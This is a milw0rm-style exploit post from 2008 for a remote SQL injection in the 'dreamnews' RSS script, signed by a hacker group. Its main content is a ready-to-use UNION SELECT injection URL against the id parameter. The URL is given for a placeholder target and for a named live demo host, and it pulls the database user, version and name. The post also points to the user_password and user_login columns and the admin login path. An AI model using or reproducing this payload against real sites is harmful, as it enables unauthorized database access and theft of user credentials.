######################################################### # # dreamnews ( rss) Remote SQL Injection Vulnerability #======================================================== # Author: Hussin X = # = # Home : www.tryag.cc/cc = # = # email: darkangel_g85[at]Yahoo[DoT]com = # = #========================================================= # # script : http://dreamlevels.com/dreamnews.php # # DorK : N/A # ########################################################## Exploit: www.[target].com/Script/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- L!VE DEMO: http://dreamlevels.com/demo/dreamnews/dreamnews-rss.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- column_name : user_password user_login Admin Login : /admin/ ########################( Greetz )########################### # # # tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke # # # # Iraqihack / FAHD / mos_chori / Silic0n # # # ############################################################# Im IRAQi # milw0rm.com [2008-07-10]